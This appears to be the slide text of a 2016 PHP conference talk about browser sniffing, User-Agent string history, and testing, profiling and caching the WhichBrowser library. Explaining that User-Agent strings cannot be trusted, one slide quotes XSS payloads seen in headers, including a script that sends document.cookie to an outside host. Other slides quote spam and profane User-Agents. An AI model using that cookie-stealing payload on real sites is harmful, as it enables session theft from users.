Everybody Lies – The story behind WhichBrowser

A presentation at PHP.FRL in August 2016 in Heerenveen, Netherlands by Niels Leenheer

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everybody lies PHP.FRL, August 23rd 2016

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1 Browser sniffing explained

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why a talk about browser sniffing?

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browser sniffing is dirty

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you should use feature detection

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why a talk about browser sniffing?

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what is browser sniffing?

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The HTTP specification defines the User-Agent header. It contains a string with information about the browser.

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Every request the browser makes to the server includes the User-Agent header

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GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net

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GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>

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You can use the User-Agent string to identify: the browser the rendering engine the operating system the device model and more

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what is browser sniffing good for?

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improve ux if you know the platform or browser, you can streamline the user experience

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analytics if you know your users, you can build a better site for them

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error logging if you know which browser is causing problems, you can fix them

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why is browser sniffing hard?

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things started out simple

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Mosaic Mosaic/0.9 The name of the browser The version of the browser

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Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system

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but it quickly started to get complicated

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Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system

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Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption

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Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 The name of the browser The version of the browser Rendering engine

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Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10 The name of the browser Fake version of the browser Real version of the browser

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Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5 The name of the rendering engine Build date of the rendering engine The name of the browser Version of the browser Version of the rendering engine

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Firefox Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Build date is no longer updated

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Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

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and it gets worse…

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Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser

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Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser

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Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser

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Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser

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Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser

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and those were all relatively normal User-Agent strings

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“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings

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Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser

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Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

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Sometimes browsers include a compatibility mode, or desktop mode which deliberately changes the User-Agent string

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Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser

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Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser

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Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version

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Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9

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Sometimes browsers are just weird

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Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

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Vehicle Center Console Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

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Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0

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Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1

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Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)

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Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1

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Mozilla/4.0 (PSP (PlayStation Portable); 2.60)

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Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

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? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2

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Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?

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BORK BORK BORK

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And it is possible to change the User-Agent string yourself

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spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

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XSS attacks

<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>

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XSS attacks

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funny people Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°

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angry people

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angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.

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User-Agent strings cannot be trusted!

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Everybody lies

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you should never use browser sniffing for controlling access to your website

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you should never use browser sniffing for determining browser capabilities

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you should never build your own browser sniffing library

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2 Creating my own browser sniffing library

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open source

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PHP 5.4 and up including PHP 7 and HHVM

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12.500 lines of code

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100% code coverage 5000+ individual tests

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device database with 36.000 entries

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psr-1 and psr-2 coding style

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psr-4 autoloading

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psr-6 caching interface

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1 How to maintain quality?

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testing of course!

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What tools do we use?

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PHP CodeSniffer

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PHP CodeSniffer Check if your code follows coding standards

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PHPUnit

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PHPUnit Very good for testing the code that defines the public apis

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PHPUnit But not so good for testing the actual browser detection

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Testrunner

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Testrunner Very lean framework for testing browser sniffing

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Testrunner YAML files that contain a list of user agent strings and the expected results

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Testrunner No coding required Just add a new user agent string and automatically generate the expected results

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Continuous integration?

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Yes, please!

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Automatically start up virtual machines that run your whole test suite after every commit

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Automatic testing of your code in multiple versions of PHP

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Automatic checking of pull requests with feedback directly in Github

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.travis.yml language: php php: - 5.4 - 5.5 - 5.6 - 7.0 - hhvm before_script: - composer self-update - composer update --ignore-platform-reqs --prefer-source script: - vendor/bin/phpcs --standard=PSR1,PSR2 -n src - php bin/runner.php --coverage --show check - vendor/bin/phpunit --coverage-clover phpunit.xml after_script: - travis_retry php vendor/bin/coveralls -v

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Check if your tests cover all of your source code

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Coverage information is generated by PHPUnit and Testrunner

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Generating code coverage

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Requires Xdebug or phpdbg

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Common format is Clover XML

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PHPUnit supports generating coverage as Clover XML phpunit --coverage-clover phpunit.xml

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For testrunner we need to convert raw Xdebug or phpdbg coverage data to Clover XML

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There is a package for that! phpunit/php-code-coverage composer require phpunit/php-code-coverage $coverage = new PHP_CodeCoverage; $coverage->filter()->addDirectoryToWhitelist('src'); $coverage->start('Testrunner'); // run your tests $coverage->stop(); $writer = new PHP_CodeCoverage_Report_Clover; $writer->process($coverage, 'runner.xml');

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2 How to make it faster!

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profiling of course!

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WhichBrowser used to be 4 times slower than it’s competitors

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UA Parser Piwik WhichBrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

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Why?

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Use Xdebug and QCacheGrind

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Xdebug has an option to create performance profiles zend_extension="/usr/local/opt/php70-xdebug/xdebug.so" xdebug.profiler_enable=1

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View performance profiles in QCacheGrind

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65% of time was spend in DeviceModels::identify()

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65% of time was spend looking through the device database

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65% of time was spend iterating over huge arrays

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DeviceModels::$ANDROID_MODELS = [ … 'GT-I92(20|28)!' 'GT-I92(30|35)!' 'GT-I9250' 'GT-I92(60|68)!' 'GT-I9295' 'GT-I93(00|03|05|08)!' 'GT-I93(01)!' 'GT-I95(00|05|07)!' 'GT-I95(02|08)!' 'GT-I95(06)!' … ]; => => => => => => => => => => [ [ [ [ [ [ [ [ [ [ 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy Note' ], Golden' ], Nexus' ], Premier' ], S4 Active' ], S III' ], S3 Neo' ], S4' ], S4 Duos' ], S4 Advance' ],

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'GT-I93(00|03|05|08)!'

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"/^GT-I93(00|03|05|08)/i"

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Why not a real database?

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Easy editing, easy deployment

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Order in the file matters

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Why a PHP file?

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No need to parse JSON or YAML

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The whole database can be cached by the opcode cache

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But you do need to iterate over every single item in that array until you have a match

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Why not create an index?

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You can’t create an index for regular expressions :-(

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Or can you?

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No, you can’t!

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If only we could determine all possible matches for a regular expression…

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1 All regular expressions are fixed to the start of the string

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2 The shorter the index, the easier it is to find the matching strings

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The ideal index length was 2 or 3 characters 1 2 3 4

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We can do that!

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/^GT-I93(00|03|05|08)/i GT

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/^(SHP-)?(SHARP )?SH[0-9]{2,3}/i SH

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/^(MEDION|(MD )?LIFETAB)/i ME, MD, LI

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/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, K0, K1, K2, K3, K4, K…

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/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, “complex list”

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Can we do this in PHP?

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There is a package for that! icomefromthenet/reverse-regex composer require icomefromthenet/reverse-regex use ReverseRegex\Lexer; $lexer = new Lexer($regexp); $lexer->moveNext(); if ($lexer->isNextTokenAny([ Lexer::T_LITERAL_CHAR,Lexer::T_LITERAL_NUMERIC ])) { … } else if ($lexer->isNextToken(Lexer::T_CHOICE_BAR)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_OPEN)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_CLOSE)) { …

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Generate keys from a regular expression in just 100 lines of code

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DeviceModels::$ANDROID_INDEX = [ … '@HW' => array ( 0 => '(HW-|HUAWEI )?(TIT|TAG)!!', 1 => '(HW-|HUAWEI |HONOR )?(ATH|CHE|CHM|HN3|H30|H60|HOL|KIW|PE|PLK|SCL)!!', 2 => '(HW-|HUAWEI )?(CHC|KII)!!', 3 => '(HW-|HUAWEI )?(ALE|D2|G6|G7|GRA|M100|P2|P6|P7|RIO|SC|Sophia)!!', 4 => '(Huawei|Ascend|HW-)!!', 5 => 'HW-01E', 6 => 'HW-03E', ), … ];

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Looking up an android device (without index) 1✕ foreach($data as $item) 15.000 ✕ preg_match($item, $model) $item === $model 1✕ return $item or

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Looking up an android device (with index) 1✕ $i = $index[substr(0,2,$model)] 1✕ foreach($i as $item) 1 - 100 ✕ preg_match($item, $model) $item === $model 1✕ return $data[$item] or

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UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

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But wait…

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Again lists of regular expressions, but with no possible way to create an index

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Multiple calls to preg_match with simple regular expressions

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if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …

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preg_match is fast

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But it has a bit of overhead

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Replace multiple calls with a single call to reduce overhead

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if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …

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if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …

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if (!preg_match(‘/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui’, $ua)) { return; } if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …

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We still do the individual checks, but only if we are certain there is a match

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UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

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On par with others, but with a massive device database

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3 How to make it even faster

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3 How to make it even faster-der!

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caching of course!

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A common use case of WhichBrowser is call it from all pages of your website

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Instead of analysing every page view you can do it once and reuse that result

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memcached redis xcache couchbase apc mongodb filesystem zend data cache wincache

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An universal caching API

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PSR-6

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Memcached // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Retrieve our data $data = $client->get($id); if ($client->getResultCode() === Memcached::RES_NOTFOUND) { $data = … $client->set($id, $data); }

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Memcached using a PSR-6 cache adapter // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }

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Redis using a PSR-6 cache adapter // Initialise the Redis client $client = new \Redis(); $client->connect('localhost', 6379); // Initialise our storage pool $pool = new \Cache\Adapter\Redis\RedisCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }

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Install adapters for the storage method you want

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Set up the storage pool and give it to WhichBrowser

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WhichBrowser without caching // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->analyse(getallheaders()); echo $result->toString();

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WhichBrowser with Memcached caching // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->setCache($pool); $result->analyse(getallheaders()); echo $result->toString();

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Just 50 lines of code

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1 Test everthing! 2 Profile everyting! 3 Cache everything!

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4 Never, ever create your own browser sniffing library

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Thank you!

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Thank you!